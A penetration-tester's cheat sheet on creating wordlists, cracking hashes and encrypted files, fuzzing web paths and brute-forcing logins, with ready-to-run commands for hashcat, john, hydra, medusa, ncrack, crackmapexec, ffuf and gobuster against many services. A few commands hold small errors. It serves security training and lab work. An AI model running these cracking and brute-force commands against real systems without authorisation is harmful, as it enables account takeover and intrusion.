Cracking / Fuzzing / Brute-force

00. Create Wordlists

00.1 Crunch

## ------------------| Usage
## crunch will display a wordlist that starts at a and ends at zzzzzzzz
crunch 8 8 -t @,%^
### Specifies a pattern, eg: @@god@@@@ where the only the @'s, ,'s, %'s, and  ^'s  will change.
### @ --> lower case characters
### , --> upper case characters
### % --> numbers
### ^ --> symbols

## crunch will display a wordlist using the character set abcdefg that starts at a and ends at gggggg
crunch 1 6 abcdefg

## ------------------| Best Usages
crunch 4 6 0123456789ABCDEF -o crunch1.txt
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha
crunch 1 8 -f charset.lst mixalpha-numeric-all-space -o wordlist.txt

00.2 CeWL

cewl --with-numbers -d 7 -m 5 -w cewl.out http(s)://IP/anything/

# -d : Depth to spider to, default 2.
# -m : Minimum word length, default 3.
# -w : Write the output to the file.
# -c : Show the count for each word found.
# -o : Let the spider visit other sites.
# --with-numbers: Accept words with numbers in as well as just letters
# --header : In format name:value - can pass multiple.
# --lowercase : Lowercase all parsed words
# --auth_user : Authentication username.
# --auth_pass : Authentication password.
# --proxy_host: Proxy host.
# --proxy_port: Proxy port, default 8080.

00.3 UserNameGen

wget https://raw.githubusercontent.com/h4rithd/UserNameGen/master/usernamegen.py
pip install argparse textwrap3 tqdm

python usernamegen.py -o output.txt -u "Harith Dilshan" 
python usernamegen.py -o output.txt -f usernames.txt

00.4 Username-Anarchy

## ------------------| Genarate quick username list for single user
ruby username-anarchy h4rithd dilshan

## ------------------| List username format plugins
ruby username-anarchy –list-formats

## ------------------| Genarate username list from file
ruby username-anarchy -input-file names.txt –select-format first,first.last,f.last,flast > newlist.txt          

01. Cracking Basic

01.1 Hashcat Basic

• Click here! to view example hashes (for to select mode -m)

hashcat --example-hashes | grep -B1 -A2 "NTLM"

• Common flags

-a             Attack-mode
--force        Ignore warnings
--status       Enable automatic update of the status screen
--status-json  Enable JSON format for status output
--session      Define specific session name
--restore      Restore session from --session
--outfile      Define outfile for recovered hash

- [ Attack Modes ] -
  # | Mode
 ===+======
  0 | Straight
  1 | Combination
  3 | Brute-force
  6 | Hybrid Wordlist + Mask
  7 | Hybrid Mask + Wordlist

• Cracking

## ------------------| Without rules
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt

## ------------------| With rules
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt  -r /usr/share/hashcat/rules/best64.rule  
hashcat hashfile -m <mode> /usr/share/wordlists/rockyou.txt  -r /usr/share/hashcat/rules/d3ad0ne.rule   

• HashCat Rules

hashcat --force passwords.list -r /usr/share/hashcat/rules/best64.rule --stdout > passwords.txt

# /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule
# /usr/share/hashcat/rules/T0XlC-insert_space_and_special_0_F.rule
# /usr/share/hashcat/rules/T0XlC-insert_top_100_passwords_1_G.rule
# /usr/share/hashcat/rules/toggles1.rule
# /usr/share/hashcat/rules/specific.rule
# /usr/share/hashcat/rules/leetspeak.rule
# /usr/share/hashcat/rules/toggles2.rule
# /usr/share/hashcat/rules/toggles3.rule
# /usr/share/hashcat/rules/InsidePro-HashManager.rule
# /usr/share/hashcat/rules/T0XlC-insert_00-99_1950-2050_toprules_0_F.rule
# /usr/share/hashcat/rules/generated.rule
# /usr/share/hashcat/rules/T0XlC.rule
# /usr/share/hashcat/rules/oscommerce.rule
# /usr/share/hashcat/rules/OneRuleToRuleThemAll.rule
# /usr/share/hashcat/rules/T0XlCv1.rule
# /usr/share/hashcat/rules/best64.rule
# /usr/share/hashcat/rules/dive.rule
# /usr/share/hashcat/rules/d3ad0ne.rule
# /usr/share/hashcat/rules/toggles5.rule
# /usr/share/hashcat/rules/combinator.rule
# /usr/share/hashcat/rules/toggles4.rule
# /usr/share/hashcat/rules/Incisive-leetspeak.rule
# /usr/share/hashcat/rules/unix-ninja-leetspeak.rule
# /usr/share/hashcat/rules/generated2.rule
# /usr/share/hashcat/rules/rockyou-30000.rule

## OneRuleToRuleThemAll
wget https://raw.githubusercontent.com/NotSoSecure/password_cracking_rules/master/OneRuleToRuleThemAll.rule  

• Create Rules and Variants

## ------------------| Create file which has word or wordlist
echo -e "PleaseSubscribe\!" >> hashes

## ------------------| Create new wordlist
hashcat --stdout hashes -r /usr/share/hashcat/rules/best64.rule > pw-list

Cheat Sheets

• https://github.com/frizb/Hashcat-Cheatsheet

• https://hashcat.net/wiki/doku.php?id=hashcat

01.2 JohnTheRipper Basic

• Cracking

john hashfile -w=/usr/share/wordlists/rockyou.txt

• John Mutation

sudo vi /etc/john/john.conf

john --wordlist=words.txt --rules --stdout > new_wordlist.txt
john --wordlist=words.txt --rules=all --stdout > new_wordlist.txt

01.3 SSH

python3.8 /usr/share/john/ssh2john.py id_rsa.pub > id_rsa.john
john id_rsa.john -w=/usr/share/wordlists/rockyou.txt

01.4 ZIP

## ------------------| For Zip
sudo apt-get install fcrackzip
fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u backup.zip
## or you can use following command with johntheripper
zip2john file.zip > hash
john hash

## ------------------| For 7z
sudo apt-get install libcompress-raw-lzma-perl
/usr/share/john/7z2john.pl backup.7z > backup.john
john backup.john -w=/usr/share/wordlists/rockyou.txt
## or you can use following command.
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z

• ZIpCrypto known plain text attack

01.5 PDF

## ------------------| Using pdfcrack
apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt

## ------------------| Using qpdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf

01.6 JWT

## ------------------| Using hashcat
hashcat -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt

## ------------------| Using jwtcrack
pip install PyJWT tqdm
git clone https://github.com/Sjord/jwtcrack.git && cd jwtcrack​
### Crack using jwtcrack
crackjwt.py <JWT_TOKEN> /usr/share/wordlists/rockyou.txt
### Convert a JWT to a format John the Ripper can understand.
jwt2john.py <JWT_TOKEN> 

## ------------------| Using JohnTheRipper
john jwt_token.txt -w=/usr/share/wordlists/rockyou.txt --format=HMAC-SHA256

01.7 VNC

echo -n <PassWordHash> | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv      

01.8 WiFi

## ------------------| AirCrack-ng
aircrack-ng captured.cap -w /usr/share/wordlists/rockyou.txt

01.9 LUKS

# ------------------| Using Hashcat
### Get count value 
cryptsetup luksDump backup.img | grep Payload
### Create luks header hashfile
dd if=backup.img of=hash bs=512 count=4097
### Cracking
hashcat -m 14600 hash /usr/share/wordlists/rockyou.txt

# ------------------| Using JohnTheRipper
luks2john.py /dev/sdb1 > sdb1.john
john sdb.john -w=/usr/share/wordlists/rockyou.txt

# ------------------| How to mount/unmount
### Mount
sudo cryptsetup luksOpen backup.img backup
sudo mount /dev/mapper/backup /mnt/ 
### Unmount
sudo umount -l /mnt/
sudo cryptsetup luksClose backup 

01.10 SUDO

# ------------------| Clone the sucrack programe and build it
git clone https://github.com/hemp3l/sucrack.git
cd sucrack
autoreconf -f -i
./configure
make
make install 
cd src
ls -al sucrack

## ------------------| Cracking process
./sucrack -a -w 20 -s 10 -u root -r dict.txt
./sucrack -a -w 20 -s 10 -u root -rx dict.tx

01.11 Microsoft Office

## ------------------| Hashcat
wget https://raw.githubusercontent.com/stricture/hashstack-server-plugin-oclhashcat/master/scrapers/office2hashcat.py                   
python2 office2hashcat.py file.xls [doc,dot,docm,xlm,ppt] > hash.txt
hashcat hash.txt /usr/share/wordlists/rockyou.txt

## ------------------| JohnTheRipper
wget https://raw.githubusercontent.com/openwall/john/bleeding-jumbo/run/office2john.py
python2 office2john.py file.xls [doc,dot,docm,xlm,ppt] > john-hash.txt
john john-hash.txt -w=/usr/share/wordlists/rockyou.txt

01.12 Group Policy Preferences

gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

01.13 PFX certificate

/usr/share/john/pfx2john.py file.pfx > file.pfx.john
john file.pfx.john -w=/usr/share/wordlists/rockyou.txt 

03. Fuzzing Basic

## ------------------| Extention list
php,html,txt
php,html,txt,bak,tar,zip
php,html,txt,bak,tar,zip,aspx,asp
php,html,txt,bak,tar,zip,aspx,asp,jsp,js
php,html,txt,bak,tar,zip,aspx,asp,jsp,js,htm,exe

03.1 ffuf

Caution: This fucking tool is not good for username/password enumeration because of "Content-Type" header. use wfuzz tool or use -request methord.

## ------------------| General options
-H                  Header "Name: Value", separated by colon. Multiple -H flags are accepted.
-X                  HTTP method to use
-b                  Cookie data "NAME1=VALUE1; NAME2=VALUE2" for copy as curl functionality.
-d                  POST data
-c                  Colorize output. (default: false)
-r                  Follow redirects (default: false)
-u                  Target URL
-v                  Verbose output, printing full URL 
-e                  Comma separated list of extensions. (.php,.txt,.html)
-x                  Proxy URL (SOCKS5 or HTTP). For example: http://127.0.0.1:8080 or socks5://127.0.0.1:8080
-ic                 Ignore wordlist comments (default: false)
-sni                Target TLS SNI, does not support FUZZ keyword
-rate               Rate of requests per second (default: 0)
-request            File containing the raw http request (Like burp request)
-request-proto      Protocol to use along with raw request (default: http
-timeout            HTTP request timeout in seconds. (default: 10)
-ignore-body        Do not fetch the response content. (default: false)
-recursion          Scan recursively. Only FUZZ keyword is supported, and URL (-u) has to end in it. (default: false)
-recursion-depth    Maximum recursion depth. (default: 0)
-recursion-strategy Recursion strategy: "default" for a redirect based, and "greedy" to recurse on all matches (default: default)     
-replay-proxy       Replay matched requests using this proxy.

## ------------------|  Filter options
-fc    Filter HTTP status codes from response. Comma separated list of codes and ranges
-fl    Filter by amount of lines in response. Comma separated list of line counts and ranges
-fr    Filter regexp
-fs    Filter HTTP response size. Comma separated list of sizes and ranges
-ft    Filter by number of milliseconds to the first response byte, either greater or less than. EG: >100 or <100   
-fw    Filter by amount of words in response. Comma separated list of word counts and ranges

## ------------------| Matcher options
-mc    Match HTTP status codes, or "all" for everything. (default: 200,204,301,302,307,401,403,405)
-ml    Match amount of lines in response
-mr    Match regexp
-ms    Match HTTP response size
-mt    Match how many milliseconds to the first response byte, either greater or less than. EG: >100 or <100   
-mw    Match amount of words in response

• Best Usage

## ------------------| Directory Fuzz
ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u https://example.org/FUZZ | tee ffuf.out    

## ------------------| With Extensions
ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u https://example.org/FUZZ -e .php,.txt,.html | tee ffuf.out    

## ------------------| Subdomain Fuzz
ffuf -w hosts.txt -u https://example.org/ -H "Host: FUZZ" -mc 200

• Fuzz with POST data

## ------------------| application/json
ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/json" -d '{"name": "FUZZ", "anotherkey": "anothervalue"}' -fr "error"

## ------------------| application/x-www-form-urlencoded
ffuf -w entries.txt -u https://example.org/ -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "name=admin\&password=FUZZ" -fr "error"

## ------------------| From burp file
ffuf -w entries.txt -request-proto http -request getUsers.req -fr "error"

03.2 wfuzz

## ------------------| Genaral Options
-u url                    : Specify a URL for the request.
-w wordlist               : Specify a wordlist file (alias for -z file,wordlist).
-V alltype                : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
-X method                 : Specify an HTTP method for the request, ie. HEAD or FUZZ
-e <type>                 : List of available encoders/payloads/iterators/printers/scripts
-c                        : Output with colors
-v                        : Verbose information.
-b cookie                 : Specify a cookie for the requests. Repeat option for various cookies.
-d postdata               : Use post data (ex: "id=FUZZ&catalogue=1")
-H header                 : Use header (ex:"Cookie:id=1312321&user=FUZZ"). Repeat option for various headers.
--basic/ntlm/digest auth  : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"
-f filename,printer       : Store results in the output file using the specified printer (raw printer if omitted).
-o printer                : Show results using the specified printer.
-t N                      : Specify the number of concurrent connections (10 default)
-s N                      : Specify time delay between requests (0 default)
-R depth                  : Recursive path discovery being depth the maximum recursion level.
-D depth                  : Maximum link depth level.
-L,--follow               : Follow HTTP redirections
-Z                        : Scan mode (Connection errors will be ignored).
--req-delay N             : Sets the maximum time in seconds the request is allowed to take (CURLOPT_TIMEOUT). Default 90.
--conn-delay N            : Sets the maximum time in seconds the connection phase to the server to take (CURLOPT_CONNECTTIMEOUT). Default 90.

## ------------------| Scripts
-A, --AA, --AAA           : Alias for -v -c and --script=default,verbose,discover respectively
--no-cache                : Disable plugins cache. Every request will be scanned.
--script=                 : Equivalent to --script=default
--script=<plugins>        : Runs script's scan. <plugins> is a comma separated list of plugin-files or plugin-categories
--script-help=<plugins>   : Show help about scripts.
--script-args n1=v1,...   : Provide arguments to scripts. ie. --script-args grep.regex="<A href=\"(.*?)\">"

## ------------------| Payloads
-m iterator               : Specify an iterator for combining payloads (product by default)
-z payload                : Specify a payload for each FUZZ keyword used in the form of name[,parameter][,encoder].
                            A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
                            Encoders category can be used. ie. url
                            Use help as a payload to show payload plugin's details (you can filter using --slice)
--zP <params>             : Arguments for the specified payload (it must be preceded by -z or -w).
--zD <default>            : Default parameter for the specified payload (it must be preceded by -z or -w).
--zE <encoder>            : Encoder for the specified payload (it must be preceded by -z or -w).
--slice <filter>          : Filter payload's elements using the specified expression. It must be preceded by -z.

## ------------------|  Filter options
--filter-help             : Filter language specification
--hc/hl/hw/hh N[,N]+      : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--sc/sl/sw/sh N[,N]+      : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--ss/hs regex             : Show/hide responses with the specified regex within the content
--filter <filter>         : Show/hide responses using the specified filter expression (Use BBB for taking values from baseline)
--prefilter <filter>      : Filter items before fuzzing using the specified expression. Repeat for concatenating filters.

• Find valid usernames | POST data

wfuzz -c -w /usr/share/seclists/Usernames/Names/names.txt -d "username=FUZZ&password=test123" --hs "No account found with that username" http://10.10.10.97/login.php | tee usernames.txt    

• Other commands

## ------------------| Range script
wfuzz -c -z range,1-65535 http:127.0.0.1:FUZZ

## ------------------| With encoders
### List avilable encoders
wfuzz -e encoders
### User url encoder
wfuzz -w /wordlist.txt,uri_hex

03.3 Gobuster

## ------------------| Genaral Options
-z, --no-progress                   Don't display progress
-o, --output string                 Output file to write results to (defaults to stdout)
-q, --quiet                         Don't print the banner and other noise
-t, --threads int                   Number of concurrent threads (default 10)
    --delay duration                Time each thread waits between requests (e.g. 1500ms)
-v, --verbose                       Verbose output (errors)
-w, --wordlist string               Path to the wordlist

-f, --add-slash                     Append / to each request
-c, --cookies string                Cookies to use for the requests
-e, --expanded                      Expanded mode, print full URLs
-x, --extensions string             File extension(s) to search for
-r, --follow-redirect               Follow redirects
-H, --headers stringArray           Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
-k, --no-tls-validation             Skip TLS certificate verification
-n, --no-status                     Don't print status codes
-p, --password string               Password for Basic Auth
-P, --proxy string                  Proxy to use for requests [http(s)://host:port][socks5://127.0.0.1:1080]
-s, --status-codes string           Positive status codes (will be overwritten with status-codes-blacklist if set) (default "200,204,301,302,307,401,403")    
-b, --status-codes-blacklist string Negative status codes (will override status-codes if set)
    --timeout duration              HTTP Timeout (default 10s)
-u, --url string                    The target URL
-a, --useragent string              Set the User-Agent string (default "gobuster/3.1.0")
-U, --username string               Username for Basic Auth
-d, --discover-backup               Upon finding a file search for backup files
    --wildcard                      Force continued operation when wildcard found

• Best Usage

gobuster dir -e -f -t 20 -k -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,html,txt -o gobuster.out -u https://mysite.com/

• DNS mode

gobuster dns -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -o gobuster-dns.out -d google.com 

• VHOST Mode

gobuster vhost -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt -o gobuster-vhost.out -u https://mysite.com 

• Search backup files

gobuster dir -e -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -d -o gobuster-backups.out -u https://mysite.com/

• Fuzzing Mode

gobuster fuzz -u https://example.com?FUZZ=test -w parameter-names.txt

03.4 DirSearch

## ------------------| Genaral Options
-u    Target URL
-e    Extension list separated by commas (Example: php,asp)
-X    Exclude extension list separated by commas (Example: asp,jsp)
-f    Add extensions to every wordlist entry. By default dirsearch only replaces the %EXT% keyword with extensions     
-t    Number of threads
-r    Brute-force recursively
-i    Include status codes, separated by commas, support ranges (Example: 200,300-399)
-x    Exclude status codes, separated by commas, support ranges (Example: 301,500-599)
-q    Quiet mode
-m    HTTP method (default: GET)
-d    HTTP request data
-H    HTTP request header, support multiple flags (Example:  -H 'Referer: example.com')
-F    Follow HTTP redirects
-s    Delay between requests

-o    Output file
--format    Report format (Available: simple, plain, json, xml,md, csv, html)

--proxy          Proxy URL, support HTTP and SOCKS proxies (Example: localhost:8080, socks5://localhost:8088)
--timeout        Connection timeout
--cookie         Choose a cookie for each request
--user-agent     Choose a User-Agent for each request
--random-agent   Choose a random User-Agent for each request
--full-url       Full URLs in the output (enabled automatically in quiet mode)
--no-color       No colored output
--exclude-sizes  Exclude responses by sizes, separated by commas (Example: 123B,4KB)
--exclude-texts  Exclude responses by texts, separated by commas (Example: 'Not found', 'Error')

-U    Uppercase wordlist
-L    Lowercase wordlist
-C    Capital wordlist

--raw=FILE    Load raw HTTP request from file (use `--scheme` flag to set the scheme)

• Best Usage

dirsearch -r -f -o `pwd`/dirsearch.out --format=plain -x 404 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -e php,html,txt -u http://example.org/

• When using HTB

url=http://nineveh.htb/department
dirsearch -f -o `pwd`/$(echo $url | cut -d '/' -f 3).out --format=plain -x 404 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -u $url -e php  

03.5 feroxbuster

## ------------------| Genaral Options
-u                    The target URL
-a                    Sets the User-Agent (default: feroxbuster/2.7.0)
-A                    Use a random User-Agent
-f                    Append / to each request's URL
-H                    Specify HTTP headers to be used in each request (ex: -H Header:val -H 'stuff: things')
-m                    Which HTTP request method(s) should be sent (default: GET)
-Q                    Request's URL query parameters (ex: -Q token=stuff -Q secret=key)
-x                    File extension(s) to search for (ex: -x php -x pdf js)
-k                    Disables TLS certificate validation in the client
-r                    Allow client to follow redirects
-T                    Number of seconds before a client's request times out (default: 7)
--data                Request's Body; can read data from a file if input starts with an @ (ex: @post.bin)
-b, --cookies         Specify HTTP cookies to be used in each request (ex: -b stuff=things)
--resume-from         State file from which to resume a partially complete scan
--burp                Set --proxy to http://127.0.0.1:8080 and set --insecure to true
--burp-replay         Set --replay-proxy to http://127.0.0.1:8080 and set --insecure to true
--smart               Set --extract-links, --auto-tune, --collect-words, and --collect-backups to true
--thorough            Use the same settings as --smart and set --collect-extensions to true
--force-recursion     Force recursion attempts on all 'found' endpoints (still respects recursion depth)

## ------------------| Response filters
-C                    Filter out status codes (deny list) (ex: -C 200 -C 401)
-N                    Filter out messages of a particular line count (ex: -N 20 -N 31,30)
-s                    Status Codes to include (allow list) (default: 200 204 301 302 307 308 401 403 405)
-S                    Filter out messages of a particular size (ex: -S 5120 -S 4927,1970)
-W                    Filter out messages of a particular word count (ex: -W 312 -W 91,82)
-X                    Filter out messages via regular expression matching on the response's body (ex: -X '^ignore me$')

## ------------------| Dynamic collection settings
-B                    Automatically request likely backup extensions for "found" urls
-E                    Automatically discover extensions and add them to --extensions (unless they're in --dont-collect)
-g                    Automatically discover important words from within responses and add them to the wordlist
-I                    File extension(s) to Ignore while collecting extensions (only used with --collect-extensions)

## ------------------| Output settings
--no-state            Disable state output file (*.state)
--silent              Only print URLs + turn off logging (good for piping a list of urls to other commands)
-o                    Output file to write results to (use w/ --json for JSON entries)
-q                    Hide progress bars and banner (good for tmux windows w/ notifications)
-v                    Increase verbosity level (use -vv or more for greater effect. [CAUTION] 4 -v's is probably too much)

• Best Usage

feroxbuster -k -f -A -u <URL>

03.6 Arjun

## ------------------| Setup
apt-get install arjun
pip3 install arjun

## ------------------| Usage
arjun -u https://api.example.com/endpoint
arjun -u https://api.example.com/endpoint -m POST
arjun -u https://api.example.com/endpoint -m JSON --include='{"root":{"a":"b",$arjun$}}'

04. Brute-force Basic

04.1 HTTP

• Common useful flags

hydra -u -f -t 10 -w 30  -L users.txt -P pass.txt 192.168.1.69 http-post-form "/login.php:user=^USER^&pass=^PASS^:Bad login" -o hydra-http-post-attack.txt

 # Host   : 192.168.1.69
 # Method : http-form-post / https-post-form / http-get-form / http-get(for basic-auth)
 # URI    : /login.php
 # Form parameters  : user=^USER^&pass=^PASS^
 # Failure response : Bad login
 # -L : users.txt
 # -l : username
 # -P : pass.txt
 # -t : Threads
 # -w : Wait for timeout
 # -S : Perform an SSL connect [https]
 # -s : If the service is on a different default port
 # -o : Output file 
 # -f : exit when a login/pass pair is found
 # -R : Restore a previous aborted/crashed session
 # -I : Ignore an existing restore file
 # -u : Loop around users, not passwords (effective! implied with -x
 
 ## If you want proxy export HYDRA_PROXY_HTTP=http://127.0.0.1:8080 

• https-post-form

hydra -S -u -f -l admin -P /usr/share/wordlists/rockyou.txt 10.10.10.75 http-post-form "/nibbleblog/admin.php:username=^USER^&password=^PASS^:Incorrect username or password"       

• http-get (basic auth) / Tomcat

hydra -u -f -l admin -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt 10.10.10.157 http-get "/monitoring"   

• With headers

hydra 192.168.1.69 http-post-form "/foo.php:user=^USER^&pass=^PASS^:S=success:C=/page/cookie:H=X-Foo: Foo" \
-L users.txt -P pass.txt -t 10 -w 1 -o hydra-http-post-attack.txt
 # in this case we specify that the cookie should be page/cookie
 # cookies can be specified with C=
 # and we also added an header with H= 
 # this header is called X-Foo and has as value Foo

04.2 SSH

## ------------------| Using Hydra
hydra -v -V -u -f -L users.txt -p "Password!" -t 2 -u $ip ssh
hydra -v -V -u -f -l root -P /usr/share/wordlists/rockyou.txt -t 2 -u $ip ssh
hydra -v -V -u -f -L users.txt -P /usr/share/wordlists/rockyou.txt -t 2 -u $ip ssh

## -v        Verbose mode
## -L        User List
## -P        Password List
## -V        How login+pass for each attempt
## -u        Loop around users, not passwords (effective! implied with -x)
## -o        Write found login/password pairs to FILE instead of stdout
## -t        Run TASKS number of connects in parallel per target (default: 16)
## -f / -F   Exit when a login/pass pair is found (-M: -f per host, -F global)

## ------------------| Using NCrack
ncrack -v -p 22 --user root -P /usr/share/wordlists/rockyou.txt <IP> -T5

## ------------------| Using Patator
patator ssh_login host=<IP> port=22022 user=sunny password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0  
patator ssh_login -x ignore:fgrep='failed' host=<IP> port=22022 user=sunny password=FILE0 0=/usr/share/wordlists/rockyou.txt persistent=0          

## ------------------| Using Medusa
medusa -h <IP> -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt -M ssh <IP>          

04.3 SMB

## ------------------| Using Nmap
nmap --script smb-brute -p 445 <IP>

## ------------------| Using CrackMapExec
crackmapexec smb <IP> -u users.txt -p /usr/share/wordlists/rockyou.txt --continue-on-success
crackmapexec smb <IP> -u Hazard -p /usr/share/wordlists/rockyou.txt --shares

## ------------------| Using Hydra
hydra -u -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb

04.4 RDP

## ------------------| Using Hydra
hydra -t 1 -V -f -u -l administrator -P /usr/share/wordlists/rockyou.txt rdp://10.10.10.10
hydra -V -f -u -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/rockyou.txt rdp://<IP>         

## ------------------| Using NCrack
ncrack -vv --user <UserName> -P /usr/share/wordlists/rockyou.txt rdp://<IP>

## ------------------| Using Crowbar
crowbar -b rdp -s <IP>/CIDR -u <USER> -C /usr/share/wordlists/rockyou.txt
crowbar -b rdp -s <IP>/CIDR -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -C /usr/share/wordlists/rockyou.txt

04.5 LDAP

## ------------------| Nmap (Basic)
nmap --script ldap-brute -p 389 <IP>

## ------------------| Using Hydra
hydra -V -f -u -L users.txt -P /usr/share/wordlists/rockyou.txt <IP> ldap2

## ------------------| Using CackMapExec
crackmapexec ldap <IP> -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt  

04.6 FTP

## ------------------| Using Hydra
hydra -u -f -l root -P /usr/share/wordlists/rockyou.txt [-t 32] <IP> ftp

## ------------------| Using Ncrack
ncrack -p 21 --user root -P /usr/share/wordlists/rockyou.txt <IP> [-T 5]

## ------------------| Using Medusa
medusa -u root -P /usr/share/wordlists/rockyou.txt -h <IP> -M ftp

04.7 SNMP

## ------------------| Using Nmap
nmap -sU --script snmp-brute <IP> [--script-args snmp-brute.communitiesdb=<wordlist> ]    

## ------------------| Using Hydra
hydra -u -f -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <IP snmp

## ------------------| Using MSF
use auxiliary/scanner/snmp/snmp_login

## ------------------| Using onesixtyone 
onesixtyone -c /usr/share/seclists/Discovery/SNMP/snmp_onesixtyone.txt <IP>

04.8 SMTP

hydra -u -f -V -l <username> -P /usr/share/wordlists/rockyou.txt <IP> smtp
### If you need ssl: use S
hydra -u -f -S -v -V -l <username> -P /usr/share/wordlists/rockyou.txt -s 587 <IP> 

04.9 WinRM

## ------------------| Using CackMapExec
crackmapexec winrm <IP> -d <Domain Name> -u /usr/share/seclists/Usernames/top-usernames-shortlist.txt -p /usr/share/wordlists/rockyou.txt  

04.10 MySQL

## ------------------| Using Hydra
hydra -u -f -l root –P /usr/share/wordlists/rockyou.txt -s 3306 <IP> mysql
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt –P /usr/share/wordlists/rockyou.txt -s <PORT> <IP> mysql             

04.11 MSSQL

## ------------------| Using Hydra
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt –P /usr/share/wordlists/rockyou.txt <IP> mssql

## ------------------| Using Medusa
medusa -h <IP> –U /usr/share/seclists/Usernames/top-usernames-shortlist.txt –P /usr/share/wordlists/rockyou.txt –M mssql

## ------------------| Using Nmap
### Use the NetBIOS name of the machine as domain
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=/usr/share/seclists/Usernames/top-usernames-shortlist.txt,passdb=/usr/share/wordlists/rockyou.txt,ms-sql-brute.brute-windows-accounts <IP>   

## ------------------| Using Metasploit
## If you have a domain set it and use USE_WINDOWS_ATHENT
use auxiliary/scanner/mssql/mssql_login

04.12 MongoDB

## ------------------| Using Nmap
nmap -sV --script mongodb-brute -n -p 27017 <IP>

## ------------------| Using Metasploit
use auxiliary/scanner/mongodb/mongodb_login

04.13 OracleSQL

## ------------------| Using Nmap
sudo nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
### Offline hash brute (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, and 11.2.0.3):
sudo nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 1<IP>
 
## ------------------| Using Patator
pip3 install cx_Oracle --upgrade
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017​.

## ------------------| Using ODAT (Oracle Database Attacking Tool)
./odat.py passwordguesser -s <SERVER_IP> -d <SID>
./odat.py passwordguesser -s <SERVER_IP> -p <PORT> --accounts-file accounts_multiple.txt

## ------------------| Using Metasploit
use admin/oracle/oracle_login
## or​
use scanner/oracle/oracle_login
set RHOSTS <IP>
set RPORTS 1521
set SID <SID>​

04.15 PostgreSQL

## ------------------| Using Hydra 
hydra -u -f -L usernames.txt –P /usr/share/wordlists/rockyou.txt <IP> postgres

## ------------------| Using Medusa
medusa -h <IP> –U usernames.txt –P /usr/share/wordlists/rockyou.txt –M postgres

## ------------------| Using Ncrack
ncrack –v –U usernames.txt –P /usr/share/wordlists/rockyou.txt <IP>:5432

## ------------------| Using Patator
patator pgsql_login host=<IP> user=FILE0 0=usernames.txt password=FILE1 1=/usr/share/wordlists/rockyou.txt

## ------------------| Using Metasploit
use auxiliary/scanner/postgres/postgres_login

## ------------------| Using Nmap
nmap -sV --script pgsql-brute --script-args userdb=usernames.txt,passdb=/usr/share/wordlists/rockyou.txt -p 5432 <IP>

04.16 Telnet

## ------------------| Using Hydra
hydra -u -f -l <username> -P /usr/share/wordlists/rockyou.txt telnet://targetname

## ------------------| Using Ncrack
ncrack -p 23 --user root -P /usr/share/wordlists/rockyou.txt <IP> [-T 5]

## ------------------| Using Medusa
medusa -u root -P /usr/share/wordlists/rockyou.txt -h <IP> -M telnet

04.17 VNC

## ------------------| Using Hydra
hydra -u -f -L /usr/share/seclists/Usernames/top-usernames-shortlist.txt –P /usr/share/wordlists/rockyou.txt -s <PORT> <IP> vnc -u -vV        

## ------------------| Using Medusa
medusa -h <IP> –u root -P /usr/share/wordlists/rockyou.txt –M vnc

## ------------------| Using Ncrack
ncrack -V --user root -P /usr/share/wordlists/rockyou.txt <IP>:5432 

## ------------------| Using Patator 
patator vnc_login host=<IP> password=FILE0 0=/usr/share/wordlists/rockyou.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0

## ------------------| Using Metasploit
use auxiliary/scanner/vnc/vnc_login

## ------------------| Using Nmap
nmap -sV --script pgsql-brute --script-args userdb=/usr/share/seclists/Usernames/top-usernames-shortlist.txt,passdb=/usr/share/wordlists/rockyou.txt -p 5432 <IP>

04.18 IRC

